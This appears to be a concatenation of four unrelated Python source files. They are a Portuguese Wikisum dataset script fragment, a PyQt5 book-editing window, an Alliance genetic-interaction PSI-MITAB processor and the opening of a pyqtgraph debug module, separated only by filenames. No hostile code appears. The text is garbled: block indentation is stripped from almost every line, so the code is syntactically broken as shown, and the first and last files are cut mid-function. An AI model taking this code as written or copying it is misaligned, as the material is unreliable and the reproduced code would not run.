with open("{}serialized_urls_list.txt".format(args.urls_sentences_output_path), 'r') as file:
for line in file:
serialized_urls.append(line.replace('\n', ''))
except:
pass
new_urls = []
for i in range(len(hash_table.hash_table)):
with open("{}{:03d}.json".format(args.urls_sentences_output_path, i), 'ab+') as out_file:
for url, sentences in hash_table.hash_table[i]:
if(url not in serialized_urls):
new_urls.append(url)
url_dict = {'url' : url, 'sentences' : sentences}
out_file.write('{}\n'.format(json.dumps(url_dict, ensure_ascii=False)).encode('utf-8'))
with open("{}serialized_urls_list.txt".format(args.urls_sentences_output_path), 'a+') as file:
for url in new_urls:
file.write('{}\n'.format(url))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Generate Wikisum-pt dataset from Wikipedia articles and BrWac corpus.')
    parser.add_argument('--workers', help='number of threads to perform web searches in parallel', default=1, type=int)
parser.add_argument('--batch_size', help='batch of articles between storages', default=10, type=int)
parser.add_argument('--brwac_file', default='data/brwac/brwac-dec13.vert', type=str)
parser.add_argument('--wiki_path', default='data/wikipedia_articles_json/', type=str)
parser.add_argument('--wiki_file', default='AA/processed_wiki_00.json', type=str)
parser.add_argument('--wiki_urls_output_path', default='data/wikipedia_ref_urls_brwac/', type=str)
parser.add_argument('--urls_sentences_output_path', default='data/brwac_ref_urls_sentences/', type=str)
args = parser.parse_args()
# turn-on the worker thread
#for i in range(args.workers):
# threading.Thread(target=worker, daemon=True).start()
main(args)
|
book_edit_window.py
|
"""
coding:utf-8
file: book_edit_window.py
@author: jiangwei
@contact: [email protected]
@time: 2020/5/10 9:12
@desc:
"""
from threading import Thread
from PyQt5.QtCore import Qt, pyqtSignal
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QWidget
from ui.add_book_window import Ui_Form
from util.dbutil import DBHelp
from util.common_util import msg_box, APP_ICON, SYS_STYLE
class BookEditWindow(Ui_Form, QWidget):
init_book_info_done_signal = pyqtSignal()
def __init__(self, book_info=None):
super(BookEditWindow, self).__init__()
self.setupUi(self)
self.book_info = book_info
self.init_ui()
self.current_book_info = list()
self.init_book_info_done_signal.connect(self.init_data)
self.add_book_pushButton.clicked.connect(self.update_book_info)
th = Thread(target=self.get_book_info)
th.start()
def init_ui(self):
self.setWindowTitle('编辑图书')
self.setWindowModality(Qt.ApplicationModal)
self.add_book_pushButton.setText('保存信息')
self.setWindowIcon(QIcon(APP_ICON))
self.setWindowFlags(Qt.WindowCloseButtonHint)
self.add_book_pushButton.setProperty('class', 'Aqua')
self.setStyleSheet(SYS_STYLE)
self.add_book_pushButton.setMinimumWidth(60)
def init_data(self):
self.book_name_lineEdit.setText(self.current_book_info[1])
self.author_lineEdit.setText(self.current_book_info[2])
self.publish_company_lineEdit.setText(self.current_book_info[3])
self.publish_date_lineEdit.setText(str(self.current_book_info[-1]))
self.store_num_lineEdit.setText(str(self.current_book_info[4]))
def get_book_info(self):
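        # Runs in a worker thread: fetch the book record from the database, then
        # notify the UI thread via init_book_info_done_signal.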
db = DBHelp()
count, res = db.query_super(table_name='book', column_name='booK_name', condition=self.book_info)
self.current_book_info = list(res[0])
self.init_book_info_done_signal.emit()
db.instance = None
del db
def update_book_info(self):
book_name = self.book_name_lineEdit.text()
author = self.author_lineEdit.text()
publish_company = self.publish_company_lineEdit.text()
publish_time = self.publish_date_lineEdit.text()
store_num = int(self.store_num_lineEdit.text())
new_book_info = [book_name, author, publish_company, publish_time, store_num]
is_update = False
if '' in new_book_info:
msg_box(self, '错误', '图书的关键信息不能为空!')
return
for new_info in new_book_info:
if new_info not in self.current_book_info:
db = DBHelp()
db.update_super(table_name='book', column_name='id', condition=self.current_book_info[0],
data=new_book_info)
db.db_commit()
db.instance = None
del db
self.close()
                is_update = True
                break  # one update already writes every field; no need to repeat it per changed value
if is_update:
msg_box(self, '提示', '图书信息更新成功!')
self.close()
|
interaction_genetic_processor.py
|
import logging
import multiprocessing
import csv
import re
import json
import os
import sys
import urllib.request
from tqdm import tqdm
from datetime import datetime
from string import Template
from processor import Processor
logger = logging.getLogger(__name__)
class HeaderTemplate(Template):
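    # string.Template subclass whose placeholders use '%' instead of the default '$'.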
delimiter = '%'
class InteractionGeneticProcessor(Processor):
def __init__(self, configs):
super().__init__()
self.data_type_configs = configs
self.master_gene_set = set()
self.master_crossreference_dictionary = dict()
self.master_crossreference_dictionary['UniProtKB'] = dict()
self.master_crossreference_dictionary['ENSEMBL'] = dict()
self.master_crossreference_dictionary['NCBI_Gene'] = dict()
self.output_dir = '/usr/src/app/output/'
self.download_dir = '/usr/src/app/download_genetic/'
def _load_and_process_data(self):
logger.debug("in InteractionGeneticProcessor")
source_filepaths = dict()
interaction_source_config = self.data_type_configs[0]
for sub_type in interaction_source_config.get_sub_type_objects():
sub_type_name = sub_type.get_sub_data_type()
sub_type_filepath = sub_type.get_filepath()
source_filepaths[sub_type_name] = sub_type_filepath
for sub_type in source_filepaths:
logger.debug("Source subtype %s filepath %s" % (sub_type, source_filepaths[sub_type]))
bgi_filepaths = dict()
interaction_source_config = self.data_type_configs[1]
for sub_type in interaction_source_config.get_sub_type_objects():
sub_type_name = sub_type.get_sub_data_type()
sub_type_filepath = sub_type.get_filepath()
bgi_filepaths[sub_type_name] = sub_type_filepath
for sub_type in bgi_filepaths:
logger.debug("BGI subtype %s filepath %s" % (sub_type, bgi_filepaths[sub_type]))
interactions_genetic = InteractionGeneticProcessor(self.data_type_configs)
interactions_genetic.parse_bgi_json()
interactions_genetic.get_data()
interactions_genetic.validate_and_upload_files_to_fms()
def parse_bgi_json(self):
# We're populating a rather large dictionary to use for looking up Alliance genes by their crossreferences.
# Edit the list below if you'd like to add more crossreferences to the dictionary.
# The key of the dictionary is the crossreference and the value is the Alliance gene to which it resolves.
#
# We're also populating the "master gene set" for gene lookups later.
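        # e.g. {'uniprotkb:q00001': ['WB:WBGene00000001']}  -- hypothetical values, for illustration only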
logger.info('Populating master gene set and crossreferences from JSON.')
bgi_filepaths = dict()
interaction_source_config = self.data_type_configs[1]
for sub_type in interaction_source_config.get_sub_type_objects():
sub_type_name = sub_type.get_sub_data_type()
sub_type_filepath = sub_type.get_filepath()
bgi_filepaths[sub_type_name] = sub_type_filepath
for sub_type in bgi_filepaths:
logger.info("BGI subtype %s filepath %s" % (sub_type, bgi_filepaths[sub_type]))
filepath = bgi_filepaths[sub_type]
with open(filepath) as json_file:
data = json.load(json_file)
logger.info('Scanning {}'.format(filepath))
# for local runs, to see progress
# for item in tqdm(data['data']):
for item in data['data']:
gene_identifier = item['basicGeneticEntity']['primaryId']
self.master_gene_set.add(gene_identifier)
for xref in item['basicGeneticEntity']['crossReferences']:
cross_ref_record = None
cross_ref_prefix = None
if xref['id'].startswith('NCBI_Gene'):
# Modify the cross reference ID to match the PSI MITAB format if necessary.
# So far, this is just converting 'NCBI_Gene' to 'entrez gene/locuslink'.
cross_ref_prefix = 'NCBI_Gene'
cross_ref_record_split = xref['id'].split(':')[1]
cross_ref_record = 'entrez gene/locuslink:' + cross_ref_record_split
elif xref['id'].startswith('UniProtKB'):
cross_ref_prefix = 'UniProtKB'
cross_ref_record = xref['id']
elif xref['id'].startswith('ENSEMBL'):
cross_ref_prefix = 'ENSEMBL'
cross_ref_record = xref['id']
# The crossreference dictionary is a list of genes linked to a single crossreference.
# Append the gene if the crossref dict entry exists.
# Otherwise, create a list and append the entry.
if cross_ref_record is not None:
if cross_ref_record.lower() in self.master_crossreference_dictionary[cross_ref_prefix]:
self.master_crossreference_dictionary[cross_ref_prefix][cross_ref_record.lower()]\
.append(gene_identifier)
else:
self.master_crossreference_dictionary[cross_ref_prefix][cross_ref_record.lower()] = []
self.master_crossreference_dictionary[cross_ref_prefix][cross_ref_record.lower()].append(
gene_identifier)
# The ids in PSI-MITAB files are lower case, hence the .lower() used above.
logger.info('Done.')
def resolve_identifiers_by_row(self, row, mapped_out):
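        # Try each candidate identifier column (indices 0/2/4/22 for interactor A,
        # 1/3/5/23 for B); when both interactors resolve to Alliance genes, write the
        # mapping to `mapped_out` and return the two resolved flags.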
interactor_A_rows = [0, 2, 4, 22]
interactor_B_rows = [1, 3, 5, 23]
interactor_A_resolved = False
interactor_B_resolved = False
for row_entry in interactor_A_rows:
try:
interactor_A_resolved, A_resolved_id = self.resolve_identifier(row[row_entry])
if interactor_A_resolved is True:
logger.debug('interactor_A_resolved True : %s' % (A_resolved_id))
break
            except IndexError:  # BioGRID rows have fewer columns than the other files; skip the missing ones.
continue
for row_entry in interactor_B_rows:
try:
interactor_B_resolved, B_resolved_id = self.resolve_identifier(row[row_entry])
if interactor_B_resolved is True:
logger.debug('interactor_B_resolved True : %s' % (B_resolved_id))
break
            except IndexError:  # BioGRID rows have fewer columns than the other files; skip the missing ones.
continue
if A_resolved_id is not None and B_resolved_id is not None:
mapped_output_rows = [row[13], A_resolved_id, B_resolved_id]
mapped_out.writerow(mapped_output_rows)
return interactor_A_resolved, interactor_B_resolved
def resolve_identifier(self, row_entry):
logger.debug('resolving: %s' % (row_entry))
list_of_crossref_regex_to_search = [
'uniprotkb:[\\w\\d_-]*$',
'ensembl:[\\w\\d_-]*$',
'entrez gene/locuslink:.*$'
]
# If we're dealing with multiple identifiers separated by a pipe.
if '|' in row_entry:
row_entries = row_entry.split('|')
else:
row_entries = [row_entry]
for individual_entry in row_entries:
logger.debug('resolving individual_entry : %s' % (individual_entry))
# For use in wormbase / flybase lookups.
# If we run into an IndexError, there's no identifier to resolve and we return False.
try:
entry_stripped = individual_entry.split(':')[1]
except IndexError:
return False, None
# uniprotkb: could have trailing '-<something>' that should be stripped
if individual_entry.startswith('uniprotkb:'):
individual_entry = individual_entry.split('-')[0]
prefixed_identifier = None
if entry_stripped.startswith('WB'):
prefixed_identifier = 'WB:' + entry_stripped
if prefixed_identifier in self.master_gene_set:
return True, prefixed_identifier
else:
logger.debug('resolved WB False : ' + prefixed_identifier)
return False, None
elif entry_stripped.startswith('FB'):
prefixed_identifier = 'FB:' + entry_stripped
if prefixed_identifier in self.master_gene_set:
logger.debug('resolved FB False : ' + prefixed_identifier)
return True, prefixed_identifier
else:
return False, None
for regex_entry in list_of_crossref_regex_to_search:
regex_output = re.findall(regex_entry, individual_entry)
if regex_output is not None:
for regex_match in regex_output: # We might have multiple regex matches. Search them all against our crossreferences.
identifier = regex_match
for crossreference_type in self.master_crossreference_dictionary.keys():
# Using lowercase in the identifier to be consistent with Alliance lowercase identifiers.
if identifier.lower() in self.master_crossreference_dictionary[crossreference_type]:
return True, identifier.lower() # Return 'True' if we find an entry.
# If we can't resolve any of the crossReferences, return None
logger.debug('resolved default False : ' + row_entry)
return False, None
def unzip_to_filename(self, filename_zip, filename):
logger.info('Extracting file {} with unzip into {}'.format(filename_zip, filename))
os.system('unzip -o {} -d {}tmp/'.format(filename_zip, self.download_dir))
logger.info('Renaming extracted file.')
os.system('mv {}tmp/* {}'.format(self.download_dir, filename))
def get_data(self):
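        # Merge the WormBase, FlyBase and BioGRID genetic-interaction files into one
        # combined PSI-MI TAB 2.7 file plus per-species files, normalizing BioGRID
        # rows and writing any row that fails a filter to the skipped-entries file.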
approved_col12 = (
# these three values were removed and replaced with the MI:2368-MI:2378 values 2021 03 19
# 'psi-mi:"MI:0794"(synthetic genetic interaction defined by inequality)',
# 'psi-mi:"MI:0796"(suppressive genetic interaction defined by inequality)',
# 'psi-mi:"MI:0799"(additive genetic interaction defined by inequality)',
'psi-mi:"MI:2368"("phenotypic enhancement (sensu biogrid)")',
'psi-mi:"MI:2369"("synthetic growth defect (sensu biogrid)")',
'psi-mi:"MI:2370"("synthetic lethality (sensu biogrid)")',
'psi-mi:"MI:2371"("positive genetic interaction (sensu biogrid)")',
'psi-mi:"MI:2372"("synthetic haploinsufficiency (sensu biogrid)")',
'psi-mi:"MI:2373"("negative genetic interaction (sensu biogrid)")',
'psi-mi:"MI:2374"("phenotypic suppression (sensu biogrid)")',
'psi-mi:"MI:2375"("synthetic rescue (sensu biogrid)")',
'psi-mi:"MI:2376"("dosage rescue (sensu biogrid)")',
'psi-mi:"MI:2377"("dosage lethality (sensu biogrid)")',
'psi-mi:"MI:2378"("dosage growth defect (sensu biogrid)")')
genetic_interaction_terms = {
'Dosage Growth Defect': {
'12': 'psi-mi:"MI:2378"(dosage growth defect (sensu biogrid))',
'19': '-', '20': '-' },
'Dosage Lethality': {
'12': 'psi-mi:"MI:2377"(dosage lethality (sensu biogrid))',
'19': '-', '20': '-' },
'Dosage Rescue': {
'12': 'psi-mi:"MI:2376"(dosage rescue (sensu biogrid))',
'19': 'psi-mi:"MI:0582"(suppressed gene)',
'20': 'psi-mi:"MI:0581"(suppressor gene)' },
'Negative Genetic': {
'12': 'psi-mi:"MI:2373"(negative genetic interaction (sensu biogrid))',
'19': '-', '20': '-' },
'Phenotypic Enhancement': {
'12': 'psi-mi:"MI:2368"(phenotypic enhancement (sensu biogrid))',
'19': 'psi-mi:"MI:2352"(enhanced gene)',
'20': 'psi-mi:"MI:2351"(enhancer gene)' },
'Phenotypic Suppression': {
'12': 'psi-mi:"MI:2374"(phenotypic suppression (sensu biogrid))',
'19': 'psi-mi:"MI:0582"(suppressed gene)',
'20': 'psi-mi:"MI:0581"(suppressor gene)' },
'Positive Genetic': {
'12': 'psi-mi:"MI:2371"(positive genetic interaction (sensu biogrid))',
'19': '-', '20': '-' },
'Synthetic Growth Defect': {
'12': 'psi-mi:"MI:2369"(synthetic growth defect (sensu biogrid))',
'19': '-', '20': '-' },
'Synthetic Haploinsufficiency': {
'12': 'psi-mi:"MI:2372"(synthetic haploinsufficiency (sensu biogrid))',
'19': '-', '20': '-' },
'Synthetic Lethality': {
'12': 'psi-mi:"MI:2370"(synthetic lethality (sensu biogrid))',
'19': '-', '20': '-' },
'Synthetic Rescue': {
'12': 'psi-mi:"MI:2375"(synthetic rescue (sensu biogrid))',
'19': '-', '20': '-' } }
source_filepaths = dict()
interaction_source_config = self.data_type_configs[0]
for sub_type in interaction_source_config.get_sub_type_objects():
sub_type_name = sub_type.get_sub_data_type()
sub_type_filepath = sub_type.get_filepath()
source_filepaths[sub_type_name] = sub_type_filepath
for sub_type in source_filepaths:
logger.info("Source subtype %s filepath %s" % (sub_type, source_filepaths[sub_type]))
wormbase_filename = source_filepaths['WB-GEN']
flybase_filename = source_filepaths['FB-GEN']
mitab_filename_zip = source_filepaths['BIOGRID']
mitab_filename = self.download_dir + 'INTERACTION-GEN_BIOGRID'
self.unzip_to_filename(mitab_filename_zip, mitab_filename)
# The order of this list is important.
parsing_list = [wormbase_filename, flybase_filename, mitab_filename]
taxon_species_set = (
'taxid:10116',
'taxid:9606',
'taxid:10090',
'taxid:6239',
'taxid:559292',
'taxid:7955',
'taxid:7227')
possible_yeast_taxon_set = ('taxid:4932', 'taxid:307796', 'taxid:643680', 'taxid:574961', 'taxid:285006', 'taxid:545124', 'taxid:764097')
interactor_type_exclusion_set = ('psi-mi:\"MI:0328\"', 'psi-mi:\"MI:1302\"', 'psi-mi:\"MI:1304\"', 'psi-mi:\"MI:0680\"')
psi_mi_tab_header = [
'#ID(s) interactor A',
'ID(s) interactor B',
'Alt. ID(s) interactor A',
'Alt. ID(s) interactor B',
'Alias(es) interactor A',
'Alias(es) interactor B',
'Interaction detection method(s)',
'Publication 1st author(s)',
'Publication Identifier(s)',
'Taxid interactor A',
'Taxid interactor B',
'Interaction type(s)',
'Source database(s)',
'Interaction identifier(s)',
'Confidence value(s)',
'Expansion method(s)',
'Biological role(s) interactor A',
'Biological role(s) interactor B',
'Experimental role(s) interactor A',
'Experimental role(s) interactor B',
'Type(s) interactor A',
'Type(s) interactor B',
'Xref(s) interactor A',
'Xref(s) interactor B',
'Interaction Xref(s)',
'Annotation(s) interactor A',
'Annotation(s) interactor B',
'Interaction annotation(s)',
'Host organism(s)',
'Interaction parameter(s)',
'Creation date',
'Update date',
'Checksum(s) interactor A',
'Checksum(s) interactor B',
'Interaction Checksum(s)',
'Negative',
'Feature(s) interactor A',
'Feature(s) interactor B',
'Stoichiometry(s) interactor A',
'Stoichiometry(s) interactor B',
'Identification method participant A',
'Identification method participant B'
]
publication_tracking_dict = {}
with open(self.output_dir + 'alliance_genetic_interactions.tsv', 'w', encoding='utf-8') as tsvout, \
open(self.output_dir + 'alliance_genetic_interactions_fly.tsv', 'w', encoding='utf-8') as fb_out, \
open(self.output_dir + 'alliance_genetic_interactions_worm.tsv', 'w', encoding='utf-8') as wb_out, \
open(self.output_dir + 'alliance_genetic_interactions_zebrafish.tsv', 'w', encoding='utf-8') as zfin_out, \
open(self.output_dir + 'alliance_genetic_interactions_yeast.tsv', 'w', encoding='utf-8') as sgd_out, \
open(self.output_dir + 'alliance_genetic_interactions_rat.tsv', 'w', encoding='utf-8') as rgd_out, \
open(self.output_dir + 'alliance_genetic_interactions_mouse.tsv', 'w', encoding='utf-8') as mgi_out, \
open(self.output_dir + 'alliance_genetic_interactions_human.tsv', 'w', encoding='utf-8') as human_out, \
open(self.output_dir + 'genetic_interactions_skipped_entries.tsv', 'w', encoding='utf-8') as skipped_out, \
open(self.output_dir + 'genetic_interactions_mapped_entries.tsv', 'a+', encoding='utf-8') as mapped_out:
tsvout = csv.writer(tsvout, quotechar = '', quoting=csv.QUOTE_NONE, delimiter='\t')
fb_out = csv.writer(fb_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
wb_out = csv.writer(wb_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
zfin_out = csv.writer(zfin_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
sgd_out = csv.writer(sgd_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
rgd_out = csv.writer(rgd_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
mgi_out = csv.writer(mgi_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
human_out = csv.writer(human_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
skipped_out = csv.writer(skipped_out, quotechar = '', quoting=csv.QUOTE_NONE, delimiter='\t')
mapped_out = csv.writer(mapped_out, quotechar = '', quoting=csv.QUOTE_NONE, delimiter='\t')
# This list is now sorted phylogenetically for the header to be sorted
out_write_list = [human_out, rgd_out, mgi_out, zfin_out, fb_out, wb_out, sgd_out]
taxon_file_dispatch_dict = {
'taxid:10116': rgd_out,
'taxid:9606': human_out,
'taxid:10090': mgi_out,
'taxid:6239': wb_out,
'taxid:559292': sgd_out,
'taxid:7955': zfin_out,
'taxid:7227': fb_out,
'taxid:4932': sgd_out,
'taxid:307796': sgd_out,
'taxid:643680': sgd_out,
'taxid:574961': sgd_out,
'taxid:285006': sgd_out,
'taxid:545124': sgd_out,
'taxid:764097': sgd_out
}
out_to_species_name_dict = {
rgd_out: 'Rattus norvegicus',
human_out: 'Homo sapiens',
mgi_out: 'Mus musculus',
wb_out: 'Caenorhabditis elegans',
sgd_out: 'Saccharomyces cerevisiae',
zfin_out: 'Danio rerio',
fb_out: 'Drosophila melanogaster'
}
out_to_header_taxonid_dict = {
rgd_out: 'NCBI:txid10116',
human_out: 'NCBI:txid9606',
mgi_out: 'NCBI:txid10090',
wb_out: 'NCBI:txid6239',
sgd_out: 'NCBI:txid559292',
zfin_out: 'NCBI:txid7955',
fb_out: 'NCBI:txid7227'
}
# Write the comments in the main file.
filetype = 'Genetic Interactions'
data_format = 'PSI-MI TAB 2.7 Format'
database_version = self.context_info.env["ALLIANCE_RELEASE"]
species_list = []
taxon_list = []
for entry in out_write_list:
taxon_list.append(out_to_header_taxonid_dict[entry])
species_list.append(out_to_species_name_dict[entry])
species = ", ".join(species_list)
taxon_ids = ", ".join(taxon_list)
taxon_ids = '# TaxonIDs: {}'.format(taxon_ids)
gen_time = datetime.utcnow().strftime("%Y-%m-%d %H:%M")
readme = 'https://github.com/HUPO-PSI/miTab/blob/master/PSI-MITAB27Format.md'
response = urllib.request.urlopen(self.context_info.env["HEADER_TEMPLATE_URL"])
header_template = HeaderTemplate(response.read().decode('ascii'))
header_dict = {'filetype': filetype, 'data_format': data_format, 'stringency_filter': '',
'taxon_ids': taxon_ids, 'database_version': database_version, 'species': species,
'gen_time': gen_time, 'readme': readme}
header = header_template.substitute(header_dict)
header_rows = [line.strip() for line in header.splitlines() if len(line.strip()) != 0]
for header_row in header_rows:
tsvout.writerow([header_row])
tsvout.writerow(psi_mi_tab_header)
for entry in out_write_list:
filetype = 'Genetic Interactions'
species = out_to_species_name_dict[entry]
taxon_ids = '# TaxonIDs: {}'.format(out_to_header_taxonid_dict[entry])
header_dict = {'filetype': filetype, 'data_format': data_format, 'stringency_filter': '',
'taxon_ids': taxon_ids, 'database_version': database_version, 'species': species,
'gen_time': gen_time, 'readme': readme}
header = header_template.substitute(header_dict)
header_rows = [line.strip() for line in header.splitlines() if len(line.strip()) != 0]
for header_row in header_rows:
entry.writerow([header_row])
entry.writerow(psi_mi_tab_header)
psi_mi_tab_header.insert(0,'Reason for skipping row.')
skipped_out.writerow(psi_mi_tab_header)
# The order of this list is important! Defined in the list above. Cannot be parallelized
for filename in parsing_list:
logger.info('Parsing file: %s' % (filename))
filename_type = None
if filename == mitab_filename:
filename_type = 'biogrid'
elif filename == flybase_filename:
filename_type = 'flybase'
elif filename == wormbase_filename:
filename_type = 'wormbase'
# Declare the tracking dict used to look for duplicates. It tracks sets.
publication_tracking_dict[filename_type] = set()
with open(filename, 'r', encoding='utf-8') as tsvin:
csv_reader = csv.reader(tsvin, delimiter='\t', quoting=csv.QUOTE_NONE)
# for local runs, to see progress
# for row in tqdm(csv_reader):
for row in csv_reader:
if row[0].startswith("#"):
row.insert(0,'Entry starts with # commented out or header')
skipped_out.writerow(row)
continue
if row[8] == '-':
row.insert(0,'Column 9 is blank, no publication')
skipped_out.writerow(row)
continue
if filename_type == 'biogrid':
if row[11] not in approved_col12:
row.insert(0,'col12 does not have an approved value: {}.'.format(row[11]))
skipped_out.writerow(row)
continue
if row[12] != 'psi-mi:"MI:0463"(biogrid)':
row.insert(0,'col13 does not equal psi-mi:"MI:0463"(biogrid): {}.'.format(row[12]))
skipped_out.writerow(row)
continue
ontology_terms = row[15]
# We need to add '-' characters to columns 17-42 for biogrid entries.
for _ in range(17,43):
row.append('-')
row[14] = '-'
row[15] = '-'
row[20] = 'psi-mi:"MI:0250"(gene)'
row[21] = 'psi-mi:"MI:0250"(gene)'
row[35] = 'false'
                            match_genetic_interaction_type = re.search(r"\((.+)\)", row[6])
row[11] = match_genetic_interaction_type.group(1)
if row[11] in genetic_interaction_terms:
row[18] = genetic_interaction_terms[row[11]]['19']
row[19] = genetic_interaction_terms[row[11]]['20']
row[11] = genetic_interaction_terms[row[11]]['12']
row[27] = ontology_terms
row[6] = 'psi-mi:"MI:0254"(genetic interference)'
try:
taxon_id_1 = re.search(r'taxid:\d+', row[9]).group(0)
except AttributeError:
row.insert(0,'Taxon ID appears to be missing for interactor A from row 10: %s' % row[9])
skipped_out.writerow(row)
continue # Skip rows where we don't find a taxon entry.
try:
taxon_id_2 = re.search(r'taxid:\d+', row[10]).group(0)
except AttributeError:
row.insert(0,'Taxon ID appears to be missing for interactor B from row 11: %s' % row[10])
skipped_out.writerow(row)
continue # Skip rows where we don't find a taxon entry.
                        if taxon_id_1 not in taxon_species_set or taxon_id_2 not in taxon_species_set:
row.insert(0,'a taxon in col10 or col11 is not an allowed taxon: {} {}.'.format(taxon_id_1, taxon_id_2))
skipped_out.writerow(row)
continue # Skip rows where we don't have Alliance species or a blank entry.
if taxon_id_1 in possible_yeast_taxon_set: # Change yeast taxon ids to the preferred 'taxid:559292'
row[9] = 'taxid:559292(Saccharomyces cerevisiae)'
if taxon_id_2 in possible_yeast_taxon_set: # Change yeast taxon ids to the preferred 'taxid:559292'
row[10] = 'taxid:559292(Saccharomyces cerevisiae)'
# Skip rows with undesired interaction types.
# Sometimes these columns don't exist in BIOGRID? IndexErrors still write the proper message and skip the entry.
if filename_type != 'biogrid': # Biogrid stops at row 16.
try:
if row[20].startswith(interactor_type_exclusion_set):
row.insert(0,'Contains a term from the interactor type exclusion set.')
skipped_out.writerow(row)
continue
except IndexError:
row.insert(0,'Interactor type column not found? Skipping entry.')
skipped_out.writerow(row)
continue
try:
if row[21].startswith(interactor_type_exclusion_set):
row.insert(0,'Contains a term from the interactor type exclusion set.')
skipped_out.writerow(row)
continue
except IndexError:
row.insert(0,'Interactor type column not found? Skipping entry.')
skipped_out.writerow(row)
continue
# Skip entries which have 'Expansion method(s)'. These only come from IMEx
                        if row[15] != '-':
row.insert(0,'Contains an expansion method.')
skipped_out.writerow(row)
continue
interactor_A_resolved, interactor_B_resolved = self.resolve_identifiers_by_row(row, mapped_out)
if interactor_A_resolved is False and interactor_B_resolved is True:
row.insert(0,'Can\'t resolve interactor A identifier, alias, alternate id, or xref against the list of known Alliance identifiers.')
skipped_out.writerow(row)
continue
elif interactor_A_resolved is True and interactor_B_resolved is False:
row.insert(0,'Can\'t resolve interactor B identifier, alias, alternate id, or xref against the list of known Alliance identifiers.')
skipped_out.writerow(row)
continue
elif interactor_A_resolved is False and interactor_B_resolved is False:
row.insert(0,'Can\'t resolve either interactor A or B identifier, alias, alternate id, or xref against the list of known Alliance identifiers.')
skipped_out.writerow(row)
continue
# Capture everything up to the first parenthesis in the taxon column.
taxon1 = re.search(r'taxid:\d+', row[9]).group(0)
taxon2 = re.search(r'taxid:\d+', row[10]).group(0)
# Grab the publication information
# Also creating a tuple "key" to use for filtering purposes.
if row[8] is not None:
publication_re = re.search(r'pubmed:\d+', row[8])
if publication_re is not None:
publication = publication_re.group(0)
# Build a filtering key from the publication, taxon1, and taxon2.
tracking_tuple = (publication, taxon1, taxon2)
exit_tsv_loop = False
for key, value in publication_tracking_dict.items():
if key != filename_type: # Don't look in our current dictionary.
if tracking_tuple in value:
row.insert(0,'Already added this interaction to the export file from %s. Filter criteria: %s' % (key, (tracking_tuple,)))
skipped_out.writerow(row)
exit_tsv_loop = True
if exit_tsv_loop == True:
continue
# If we loop through all the possible sets and don't continue, add the tuple.
publication_tracking_dict[filename_type].add(tracking_tuple)
tsvout.writerow(row)
self.wrote_to_file_already = False
try:
taxon_file_dispatch_dict[taxon1].writerow(row)
self.wrote_to_file_already = True
except KeyError:
pass
try:
if self.wrote_to_file_already is False:
taxon_file_dispatch_dict[taxon2].writerow(row)
except KeyError:
pass
def validate_and_upload_files_to_fms(self):
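        # Launch one subprocess per generated file to upload it to the FMS under its
        # data subtype, then wait for all uploads to finish.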
logger.info('Summary of files created:')
logger.info(os.system("ls -alh {}*".format(self.output_dir)))
upload_location_dict = {
'alliance_genetic_interactions.tsv': 'COMBINED',
'alliance_genetic_interactions_fly.tsv': 'FB',
'alliance_genetic_interactions_worm.tsv': 'WB',
'alliance_genetic_interactions_zebrafish.tsv': 'ZFIN',
'alliance_genetic_interactions_yeast.tsv': 'SGD',
'alliance_genetic_interactions_rat.tsv': 'RGD',
'alliance_genetic_interactions_mouse.tsv': 'MGI',
'alliance_genetic_interactions_human.tsv': 'HUMAN'
}
thread_pool = []
for filename in upload_location_dict.keys():
dataSubType = upload_location_dict[filename]
p = multiprocessing.Process(target=super().fms_upload, args=("INTERACTION-GEN", dataSubType, filename))
p.start()
thread_pool.append(p)
Processor.wait_for_threads(thread_pool)
|
debug.py
|
# -*- coding: utf-8 -*-
"""
debug.py - Functions to aid in debugging
Copyright 2010 Luke Campagnola
Distributed under MIT/X11 license. See license.txt for more information.
"""
from __future__ import print_function
import sys, traceback, time, gc, re, types, weakref, inspect, os, cProfile, threading
from . import ptime
from numpy import ndarray
from .Qt import QtCore
from .util.mutex import Mutex
from .util import cprint
__ftraceDepth = 0
def ftrace(func):
"""Decorator used for marking the beginning and end of function calls.
Automatically indents nested calls.
"""
def w(*args, **kargs):
global __ftraceDepth
pfx = " " * __ftraceDepth
print(pfx + func.__name__ + " start")
__ftraceDepth += 1
try:
rv = func(*args, **kargs)
finally:
__ftraceDepth -= 1
print(pfx + func.__name__ + " done")
return rv
return w
class Tracer(object):
"""
Prints every function enter/exit. Useful for debugging crashes / lockups.
"""
def __init__(self):
self.count = 0
self.stack = []
def trace(self, frame, event, arg):
self.count += 1
# If it has been a long time since we saw the top of the stack,
# print a reminder
if self.count % 1000 == 0:
print("----- current stack: -----")
for line in self.stack:
print(line)
if event == 'call':
line = " " * len(self.stack) + ">> " + self.frameInfo(frame)
print(line)
self.stack.append(line)
elif event == 'return':
self.stack.pop()
line = " " * len(self.stack) + "<< " + self.frameInfo(frame)
print(line)
if len(self.stack) == 0:
self.count = 0
return self.trace
def stop(self):
sys.settrace(None)
def start(self):
sys.settrace(self.trace)
def frameInfo(self, fr):
filename = fr.f_code.co_filename
funcname = fr.f_code.co_name
lineno = fr.f_lineno
callfr = sys._getframe(3)
callline = "%s %d" % (callfr.f_code.co_name, callfr.f_lineno)
args, _, _, value_dict = inspect.getargvalues(fr)
if len(args) and args[0] == 'self':
instance = value_dict.get('self', None)
if instance is not None:
cls = getattr(instance, '__class__', None)
if cls is not None:
funcname = cls.__name__ + "." + funcname
return "%s: %s %s: %s" % (callline, filename, lineno, funcname)
def warnOnException(func):
"""Decorator that catches/ignores exceptions and prints a stack trace."""
def w(*args, **kwds):
try:
func(*args, **kwds)
except:
printExc('Ignored exception:')
return w
def getExc(indent=4, prefix='| ', skip=1):
lines = formatException(*sys.exc_info(), skip=skip)
lines2 = []
for l in lines:
lines2.extend(l.strip('\n').split('\n'))
lines3 = [" "*indent + prefix + l for l in lines2]
return '\n'.join(lines3)
def printExc(msg='', indent=4, prefix='|'):
"""Print an error message followed by an indented exception backtrace
(This function is intended to be called within except: blocks)"""
exc = getExc(indent, prefix + ' ', skip=2)
print("[%s] %s\n" % (time.strftime("%H:%M:%S"), msg))
print(" "*indent + prefix + '='*30 + '>>')
